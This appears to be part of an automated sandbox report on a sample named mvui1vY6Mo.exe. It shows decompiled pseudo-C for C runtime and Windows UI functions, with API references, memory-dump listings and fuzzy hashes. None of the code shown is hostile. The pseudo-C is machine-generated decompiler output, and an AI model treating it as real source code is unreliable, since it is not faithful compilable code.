                                              • Opcode Fuzzy Hash: 90fce05cf2361d9775bc9f0dac523b89fbd8116222fc3253ece204ca4f1a7e5f
                                              • Instruction Fuzzy Hash: 31F0D676120A0AA6D612B6247D09B3BE6698BC1BF4B210036F704F22A2DE61CA258964
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FD5A0(void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                              				int _v8;
                                              
                                              				_v8 = _a8;
                                              				if(_v8 == 1) {
                                              					CreateWindowExW(0, L"button", 0x304a38, 0x50000000, 0x32, 0x32, 0x50, 0x19, _a4, 1, 0, 0);
                                              				} else {
                                              					if(_v8 == 0x10) {
                                              						DestroyWindow(_a4);
                                              					} else {
                                              						if(_v8 == 0x111) {
                                              							DestroyWindow(_a4);
                                              						}
                                              					}
                                              				}
                                              				return DefWindowProcW(_a4, _a8, _a12, _a16);
                                              			}




                                              0x002fd5a7
                                              0x002fd5ae
                                              0x002fd5e4
                                              0x002fd5b0
                                              0x002fd5b4
                                              0x002fd5fc
                                              0x002fd5b6
                                              0x002fd5bd
                                              0x002fd5f0
                                              0x002fd5f0
                                              0x002fd5bd
                                              0x002fd5b4
                                              0x002fd61b

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Window$Destroy$CreateProc
                                              • String ID: button
                                              • API String ID: 3790344893-973515837
                                              • Opcode ID: 63ed79ee088aecf3b6efbbc68fe3f5ffb85948c6cba8564295eb1f24e7b244d7
                                              • Instruction ID: d42274ceb8a78e03b9c3b28fdde1f1b11fd51a4b9bca436c82d9702403315367
                                              • Opcode Fuzzy Hash: 63ed79ee088aecf3b6efbbc68fe3f5ffb85948c6cba8564295eb1f24e7b244d7
                                              • Instruction Fuzzy Hash: 7F0140B529020CFBDB14CF54DC5EFAAB769AB08785F508118FB099B2D0C6B09E10DB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,002F2E41,00000003,?,002F2DE1,00000003,00302E60,0000000C,002F2F38,00000003,00000002), ref: 002F2EB0
                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002F2EC3
                                              • FreeLibrary.KERNEL32(00000000,?,?,?,002F2E41,00000003,?,002F2DE1,00000003,00302E60,0000000C,002F2F38,00000003,00000002,00000000), ref: 002F2EE6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: AddressFreeHandleLibraryModuleProc
                                              • String ID: CorExitProcess$mscoree.dll
                                              • API String ID: 4061214504-1276376045
                                              • Opcode ID: 5c649f52ed6c3203a98318a1b517c7364a73057f365f33bbef307f7eec96961c
                                              • Instruction ID: 07f7f2434e329cbd8d30b1d3cb5b761a2a893577e36cb5a14272e31944ed56ba
                                              • Opcode Fuzzy Hash: 5c649f52ed6c3203a98318a1b517c7364a73057f365f33bbef307f7eec96961c
                                              • Instruction Fuzzy Hash: DAF0813191111DBBDF129F91DC0DBBEBFA8EF04791F020078EA06A2160DB705E64CA91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 81%
                                              			E002F5BAB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                              				signed int _v8;
                                              				int _v12;
                                              				char _v16;
                                              				intOrPtr _v24;
                                              				char _v28;
                                              				void* _v40;
                                              				signed int _t34;
                                              				signed int _t40;
                                              				int _t46;
                                              				int _t53;
                                              				void* _t55;
                                              				int _t57;
                                              				signed int _t63;
                                              				int _t67;
                                              				short* _t69;
                                              				signed int _t70;
                                              				short* _t71;
                                              
                                              				_t34 =  *0x304018; // 0x9021af28
                                              				_v8 = _t34 ^ _t70;
                                              				E002F3784(__ebx,  &_v28, __edx, _a4);
                                              				_t57 = _a24;
                                              				if(_t57 == 0) {
                                              					_t53 =  *(_v24 + 8);
                                              					_t57 = _t53;
                                              					_a24 = _t53;
                                              				}
                                              				_t67 = 0;
                                              				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                              				_v12 = _t40;
                                              				if(_t40 == 0) {
                                              					L15:
                                              					if(_v16 != 0) {
                                              						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                              					}
                                              					return E002F19D1(_v8 ^ _t70);
                                              				}
                                              				_t55 = _t40 + _t40;
                                              				_t17 = _t55 + 8; // 0x8
                                              				asm("sbb eax, eax");
                                              				if((_t17 & _t40) == 0) {
                                              					_t69 = 0;
                                              					L11:
                                              					if(_t69 != 0) {
                                              						E002F1D00(_t67, _t69, _t67, _t55);
                                              						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
                                              						if(_t46 != 0) {
                                              							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
                                              						}
                                              					}
                                              					L14:
                                              					E002F5CC8(_t69);
                                              					goto L15;
                                              				}
                                              				_t20 = _t55 + 8; // 0x8
                                              				asm("sbb eax, eax");
                                              				_t48 = _t40 & _t20;
                                              				_t21 = _t55 + 8; // 0x8
                                              				_t63 = _t21;
                                              				if((_t40 & _t20) > 0x400) {
                                              					asm("sbb eax, eax");
                                              					_t69 = E002F3696(_t63, _t48 & _t63);
                                              					if(_t69 == 0) {
                                              						goto L14;
                                              					}
                                              					 *_t69 = 0xdddd;
                                              					L9:
                                              					_t69 =  &(_t69[4]);
                                              					goto L11;
                                              				}
                                              				asm("sbb eax, eax");
                                              				E002FA3A0();
                                              				_t69 = _t71;
                                              				if(_t69 == 0) {
                                              					goto L14;
                                              				}
                                              				 *_t69 = 0xcccc;
                                              				goto L9;
                                              			}




















                                              0x002f5bb3
                                              0x002f5bba
                                              0x002f5bc6
                                              0x002f5bcb
                                              0x002f5bd0
                                              0x002f5bd5
                                              0x002f5bd8
                                              0x002f5bda
                                              0x002f5bda
                                              0x002f5bdf
                                              0x002f5bf8
                                              0x002f5bfe
                                              0x002f5c03
                                              0x002f5ca2
                                              0x002f5ca6
                                              0x002f5cab
                                              0x002f5cab
                                              0x002f5cc7
                                              0x002f5cc7
                                              0x002f5c09
                                              0x002f5c0c
                                              0x002f5c11
                                              0x002f5c15
                                              0x002f5c61
                                              0x002f5c63
                                              0x002f5c65
                                              0x002f5c6a
                                              0x002f5c81
                                              0x002f5c89
                                              0x002f5c99
                                              0x002f5c99
                                              0x002f5c89
                                              0x002f5c9b
                                              0x002f5c9c
                                              0x00000000
                                              0x002f5ca1
                                              0x002f5c17
                                              0x002f5c1c
                                              0x002f5c1e
                                              0x002f5c20
                                              0x002f5c20
                                              0x002f5c28
                                              0x002f5c45
                                              0x002f5c4f
                                              0x002f5c54
                                              0x00000000
                                              0x00000000
                                              0x002f5c56
                                              0x002f5c5c
                                              0x002f5c5c
                                              0x00000000
                                              0x002f5c5c
                                              0x002f5c2c
                                              0x002f5c30
                                              0x002f5c35
                                              0x002f5c39
                                              0x00000000
                                              0x00000000
                                              0x002f5c3b
                                              0x00000000

                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 002F5BF8
                                              • __alloca_probe_16.LIBCMT ref: 002F5C30
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 002F5C81
                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 002F5C93
                                              • __freea.LIBCMT ref: 002F5C9C
                                                • Part of subcall function 002F3696: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,002F381C,?,00000000,?,002F60CD,?,00000004,00000000,?,?,?,002F3361), ref: 002F36C8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                              • String ID:
                                              • API String ID: 313313983-0
                                              • Opcode ID: 994da4771ba85c6474a5b7d6ca759115d108b2da80b91d4c18234df2f4d6585c
                                              • Instruction ID: b9b839e41c67eb9019fc458c797dbe0ee4b36f643feb935d798e018a001ab979
                                              • Opcode Fuzzy Hash: 994da4771ba85c6474a5b7d6ca759115d108b2da80b91d4c18234df2f4d6585c
                                              • Instruction Fuzzy Hash: BB31E272A2061EABCF258F64DC85DBEBBA5EB40790F050139FE06D6250E735CD60CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 82%
                                              			E002F3C66(void* __ecx, void* __edx) {
                                              				void* __esi;
                                              				intOrPtr _t2;
                                              				void* _t4;
                                              				void* _t10;
                                              				void* _t11;
                                              				void* _t13;
                                              				void* _t16;
                                              				long _t17;
                                              
                                              				_t11 = __ecx;
                                              				_t17 = GetLastError();
                                              				_t10 = 0;
                                              				_t2 =  *0x304044; // 0x7
                                              				_t20 = _t2 - 0xffffffff;
                                              				if(_t2 == 0xffffffff) {
                                              					L2:
                                              					_t16 = E002F3727(_t11, 1, 0x364);
                                              					_pop(_t13);
                                              					if(_t16 != 0) {
                                              						_t4 = E002F51C1(_t13, _t17, __eflags,  *0x304044, _t16);
                                              						__eflags = _t4;
                                              						if(_t4 != 0) {
                                              							E002F3A54(_t13, _t16, "xE0");
                                              							E002F365C(_t10);
                                              							__eflags = _t16;
                                              							if(_t16 != 0) {
                                              								goto L9;
                                              							} else {
                                              								goto L8;
                                              							}
                                              						} else {
                                              							_push(_t16);
                                              							goto L4;
                                              						}
                                              					} else {
                                              						_push(_t10);
                                              						L4:
                                              						E002F365C();
                                              						L8:
                                              						SetLastError(_t17);
                                              					}
                                              				} else {
                                              					_t16 = E002F516B(_t11, _t17, _t20, _t2);
                                              					if(_t16 != 0) {
                                              						L9:
                                              						SetLastError(_t17);
                                              						_t10 = _t16;
                                              					} else {
                                              						goto L2;
                                              					}
                                              				}
                                              				return _t10;
                                              			}











                                              0x002f3c66
                                              0x002f3c71
                                              0x002f3c73
                                              0x002f3c75
                                              0x002f3c7a
                                              0x002f3c7d
                                              0x002f3c8b
                                              0x002f3c97
                                              0x002f3c9a
                                              0x002f3c9d
                                              0x002f3caf
                                              0x002f3cb4
                                              0x002f3cb6
                                              0x002f3cc1
                                              0x002f3cc7
                                              0x002f3ccf
                                              0x002f3cd1
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002f3cb8
                                              0x002f3cb8
                                              0x00000000
                                              0x002f3cb8
                                              0x002f3c9f
                                              0x002f3c9f
                                              0x002f3ca0
                                              0x002f3ca0
                                              0x002f3cd3
                                              0x002f3cd4
                                              0x002f3cd4
                                              0x002f3c7f
                                              0x002f3c85
                                              0x002f3c89
                                              0x002f3cdc
                                              0x002f3cdd
                                              0x002f3ce3
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002f3c89
                                              0x002f3cea

                                              APIs
                                              • GetLastError.KERNEL32(?,?,?,002F4129,002F383A,?,002F60CD,?,00000004,00000000,?,?,?,002F3361,?,00000000), ref: 002F3C6B
                                              • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 002F3CD4
                                              • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 002F3CDD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: ErrorLast
                                              • String ID: xE0
                                              • API String ID: 1452528299-242510614
                                              • Opcode ID: 49156b66d3d9024900b61af4487613cc4614e6f04a7d2680b0065f17401a7038
                                              • Instruction ID: c06f9e801c296705a9a37d63bbb087ae6fc6d2ecf5f63a11e47345835957cb60
                                              • Opcode Fuzzy Hash: 49156b66d3d9024900b61af4487613cc4614e6f04a7d2680b0065f17401a7038
                                              • Instruction Fuzzy Hash: 8001DB72260A097BD612E6256D59D7BE55D9BC13F0721003AFB15F3292DE60CB268524
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 95%
                                              			E002F5044(signed int _a4) {
                                              				signed int _t9;
                                              				void* _t13;
                                              				signed int _t15;
                                              				WCHAR* _t22;
                                              				signed int _t24;
                                              				signed int* _t25;
                                              				void* _t27;
                                              
                                              				_t9 = _a4;
                                              				_t25 = 0x305620 + _t9 * 4;
                                              				_t24 =  *_t25;
                                              				if(_t24 == 0) {
                                              					_t22 =  *(0x2fed58 + _t9 * 4);
                                              					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                              					if(_t27 != 0) {
                                              						L8:
                                              						 *_t25 = _t27;
                                              						if( *_t25 != 0) {
                                              							FreeLibrary(_t27);
                                              						}
                                              						_t13 = _t27;
                                              						L11:
                                              						return _t13;
                                              					}
                                              					_t15 = GetLastError();
                                              					if(_t15 != 0x57) {
                                              						_t27 = 0;
                                              					} else {
                                              						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                              						_t27 = _t15;
                                              					}
                                              					if(_t27 != 0) {
                                              						goto L8;
                                              					} else {
                                              						 *_t25 = _t15 | 0xffffffff;
                                              						_t13 = 0;
                                              						goto L11;
                                              					}
                                              				}
                                              				_t4 = _t24 + 1; // 0x9021af29
                                              				asm("sbb eax, eax");
                                              				return  ~_t4 & _t24;
                                              			}










                                              0x002f5049
                                              0x002f504d
                                              0x002f5054
                                              0x002f5058
                                              0x002f5066
                                              0x002f507c
                                              0x002f5080
                                              0x002f50a9
                                              0x002f50ab
                                              0x002f50af
                                              0x002f50b2
                                              0x002f50b2
                                              0x002f50b8
                                              0x002f50ba
                                              0x00000000
                                              0x002f50bb
                                              0x002f5082
                                              0x002f508b
                                              0x002f509a
                                              0x002f508d
                                              0x002f5090
                                              0x002f5096
                                              0x002f5096
                                              0x002f509e
                                              0x00000000
                                              0x002f50a0
                                              0x002f50a3
                                              0x002f50a5
                                              0x00000000
                                              0x002f50a5
                                              0x002f509e
                                              0x002f505a
                                              0x002f505f
                                              0x00000000

                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,002F4FEB,00000000,00000000,00000000,00000000,?,002F51E8,00000006,FlsSetValue), ref: 002F5076
                                              • GetLastError.KERNEL32(?,002F4FEB,00000000,00000000,00000000,00000000,?,002F51E8,00000006,FlsSetValue,002FF210,002FF218,00000000,00000364,?,002F3CB4), ref: 002F5082
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,002F4FEB,00000000,00000000,00000000,00000000,?,002F51E8,00000006,FlsSetValue,002FF210,002FF218,00000000), ref: 002F5090
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID:
                                              • API String ID: 3177248105-0
                                              • Opcode ID: 833d66b15a193f527897590db42c51858bdd78ff7dd5a149a7736da26a1fdee8
                                              • Instruction ID: 92fd3b9d13aa167ed9e78f9f316cf23fc3ce3dcedf4195c300ef6a34c55a3585
                                              • Opcode Fuzzy Hash: 833d66b15a193f527897590db42c51858bdd78ff7dd5a149a7736da26a1fdee8
                                              • Instruction Fuzzy Hash: EF01DD31621A3BABCB314E68AC48D76B758EF097F17110538FB05D3250DE60D810C6E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002F1CB6() {
                                              				void* _t4;
                                              				void* _t8;
                                              
                                              				E002F2317();
                                              				E002F22AB();
                                              				if(E002F2028() != 0) {
                                              					_t4 = E002F1FDA(_t8, __eflags);
                                              					__eflags = _t4;
                                              					if(_t4 != 0) {
                                              						return 1;
                                              					} else {
                                              						E002F2064();
                                              						goto L1;
                                              					}
                                              				} else {
                                              					L1:
                                              					return 0;
                                              				}
                                              			}





                                              0x002f1cb6
                                              0x002f1cbb
                                              0x002f1cc7
                                              0x002f1ccc
                                              0x002f1cd1
                                              0x002f1cd3
                                              0x002f1cde
                                              0x002f1cd5
                                              0x002f1cd5
                                              0x00000000
                                              0x002f1cd5
                                              0x002f1cc9
                                              0x002f1cc9
                                              0x002f1ccb
                                              0x002f1ccb

                                              APIs
                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 002F1CB6
                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 002F1CBB
                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 002F1CC0
                                                • Part of subcall function 002F2028: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 002F2039
                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 002F1CD5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                              • String ID:
                                              • API String ID: 1761009282-0
                                              • Opcode ID: 42cfafaaf29d4f7fdf202ad325c91aa28037371ee4c1ad4e7deb3511513870bf
                                              • Instruction ID: e13ba2afff98d71b560222bd782f45c3bf61d84a0700566cab0a4c4e6d071c33
                                              • Opcode Fuzzy Hash: 42cfafaaf29d4f7fdf202ad325c91aa28037371ee4c1ad4e7deb3511513870bf
                                              • Instruction Fuzzy Hash: FEC0021907035ED46C243AB126521BDD34018733C57D125FAAB5116513CE06083F9D3B
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 88%
                                              			E002F26C4(intOrPtr _a4) {
                                              				signed int _v8;
                                              				void* _v12;
                                              				char _v16;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				intOrPtr* _t35;
                                              				struct HINSTANCE__* _t36;
                                              				struct HINSTANCE__* _t42;
                                              				intOrPtr* _t43;
                                              				intOrPtr* _t44;
                                              				WCHAR* _t48;
                                              				struct HINSTANCE__* _t49;
                                              				struct HINSTANCE__* _t53;
                                              				intOrPtr* _t56;
                                              				struct HINSTANCE__* _t61;
                                              				intOrPtr _t62;
                                              
                                              				if(_a4 == 2 || _a4 == 1) {
                                              					GetModuleFileNameW(0, 0x305250, 0x104);
                                              					_t48 =  *0x3054d4; // 0x12d1c30
                                              					 *0x3054d8 = 0x305250;
                                              					if(_t48 == 0 ||  *_t48 == 0) {
                                              						_t48 = 0x305250;
                                              					}
                                              					_v8 = 0;
                                              					_v16 = 0;
                                              					E002F27E3(_t48, 0, 0,  &_v8,  &_v16);
                                              					_t61 = E002F2969(_v8, _v16, 2);
                                              					if(_t61 != 0) {
                                              						E002F27E3(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
                                              						if(_a4 != 1) {
                                              							_v12 = 0;
                                              							_push( &_v12);
                                              							_t49 = E002F4651(_t48, 0, _t61, _t61);
                                              							if(_t49 == 0) {
                                              								_t56 = _v12;
                                              								_t53 = 0;
                                              								_t35 = _t56;
                                              								if( *_t56 == 0) {
                                              									L15:
                                              									_t36 = 0;
                                              									 *0x3054c4 = _t53;
                                              									_v12 = 0;
                                              									_t49 = 0;
                                              									 *0x3054cc = _t56;
                                              									L16:
                                              									E002F365C(_t36);
                                              									_v12 = 0;
                                              									goto L17;
                                              								} else {
                                              									goto L14;
                                              								}
                                              								do {
                                              									L14:
                                              									_t35 = _t35 + 4;
                                              									_t53 =  &(_t53->i);
                                              								} while ( *_t35 != 0);
                                              								goto L15;
                                              							}
                                              							_t36 = _v12;
                                              							goto L16;
                                              						}
                                              						 *0x3054c4 = _v8 - 1;
                                              						_t42 = _t61;
                                              						_t61 = 0;
                                              						 *0x3054cc = _t42;
                                              						goto L10;
                                              					} else {
                                              						_t43 = E002F4124();
                                              						_push(0xc);
                                              						_pop(0);
                                              						 *_t43 = 0;
                                              						L10:
                                              						_t49 = 0;
                                              						L17:
                                              						E002F365C(_t61);
                                              						return _t49;
                                              					}
                                              				} else {
                                              					_t44 = E002F4124();
                                              					_t62 = 0x16;
                                              					 *_t44 = _t62;
                                              					E002F3F2C();
                                              					return _t62;
                                              				}
                                              			}




















                                              0x002f26d1
                                              0x002f26ff
                                              0x002f2705
                                              0x002f270b
                                              0x002f2713
                                              0x002f271a
                                              0x002f271a
                                              0x002f271f
                                              0x002f2726
                                              0x002f272d
                                              0x002f273f
                                              0x002f2746
                                              0x002f2765
                                              0x002f2771
                                              0x002f278c
                                              0x002f278f
                                              0x002f2796
                                              0x002f279c
                                              0x002f27a3
                                              0x002f27a6
                                              0x002f27a8
                                              0x002f27ac
                                              0x002f27b6
                                              0x002f27b6
                                              0x002f27b8
                                              0x002f27be
                                              0x002f27c1
                                              0x002f27c3
                                              0x002f27c9
                                              0x002f27ca
                                              0x002f27d0
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002f27ae
                                              0x002f27ae
                                              0x002f27ae
                                              0x002f27b1
                                              0x002f27b2
                                              0x00000000
                                              0x002f27ae
                                              0x002f279e
                                              0x00000000
                                              0x002f279e
                                              0x002f2777
                                              0x002f277c
                                              0x002f277e
                                              0x002f2780
                                              0x00000000
                                              0x002f2748
                                              0x002f2748
                                              0x002f274d
                                              0x002f274f
                                              0x002f2750
                                              0x002f2785
                                              0x002f2785
                                              0x002f27d3
                                              0x002f27d4
                                              0x00000000
                                              0x002f27dd
                                              0x002f26d9
                                              0x002f26d9
                                              0x002f26e0
                                              0x002f26e1
                                              0x002f26e3
                                              0x00000000
                                              0x002f26e8

                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\mvui1vY6Mo.exe,00000104), ref: 002F26FF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: FileModuleName
                                              • String ID: C:\Users\user\Desktop\mvui1vY6Mo.exe$PR0
                                              • API String ID: 514040917-4160807643
                                              • Opcode ID: b5c1af07ebf4d18a8d405641ce05d95f633d4cc8b933819ddbbb51b3e7e35847
                                              • Instruction ID: 64dfc2d2df056aa2e9013f6a3b08e8fe44f8ec193adc48bc890635fb07c945c4
                                              • Opcode Fuzzy Hash: b5c1af07ebf4d18a8d405641ce05d95f633d4cc8b933819ddbbb51b3e7e35847
                                              • Instruction Fuzzy Hash: 80316F71A1061DEBDB21EF969C858BFFBBCEB86390B104077E60897211D6B08E94CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 37%
                                              			E002F19D1(void* __ecx, struct _EXCEPTION_POINTERS* _a4) {
                                              
                                              				asm("repne jnz 0x5");
                                              				asm("repne ret");
                                              				asm("repne jmp 0x2e");
                                              				SetUnhandledExceptionFilter(0);
                                              				UnhandledExceptionFilter(_a4);
                                              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                              			}



                                              0x002f19d7
                                              0x002f19da
                                              0x002f19dc
                                              0x002f19e7
                                              0x002f19f0
                                              0x002f1a09

                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002F1A15
                                              • ___raise_securityfailure.LIBCMT ref: 002F1AFC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                              • String ID: pN0
                                              • API String ID: 3761405300-3818120037
                                              • Opcode ID: 1376b22b2c3dc03725c937f12aaf92870e445229900fb4f1b52e78d1e4a0790b
                                              • Instruction ID: 0d308b0168ceff8ee4c472d712f4ffead926be543852b325115c94fc1546d034
                                              • Opcode Fuzzy Hash: 1376b22b2c3dc03725c937f12aaf92870e445229900fb4f1b52e78d1e4a0790b
                                              • Instruction Fuzzy Hash: 232112F551220ADFD712DF68FA62615BBACFB48350F11412BEB088B3B0E7B45A91CB41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FCA50(intOrPtr _a4) {
                                              				struct %anon38 _v40;
                                              				intOrPtr _t23;
                                              
                                              				_v40.lStructSize = 0;
                                              				_v40.hwndOwner = 0;
                                              				_v40.hInstance = 0;
                                              				_v40.rgbResult = 0;
                                              				_v40.lpCustColors = 0;
                                              				_v40.Flags = 0;
                                              				_v40.lCustData = 0;
                                              				_v40.lpfnHook = 0;
                                              				_v40.lpTemplateName = 0;
                                              				_v40.lStructSize = 0x24;
                                              				_v40.hwndOwner = _a4;
                                              				_v40.lpCustColors = 0x305948;
                                              				_t23 =  *0x304a00; // 0xffffff
                                              				_v40.rgbResult = _t23;
                                              				_v40.Flags = 3;
                                              				ChooseColorW( &_v40);
                                              				return _v40.rgbResult;
                                              			}





                                              0x002fca58
                                              0x002fca5b
                                              0x002fca5e
                                              0x002fca61
                                              0x002fca64
                                              0x002fca67
                                              0x002fca6a
                                              0x002fca6d
                                              0x002fca70
                                              0x002fca73
                                              0x002fca7d
                                              0x002fca80
                                              0x002fca87
                                              0x002fca8d
                                              0x002fca90
                                              0x002fca9b
                                              0x002fcaa7

                                              APIs
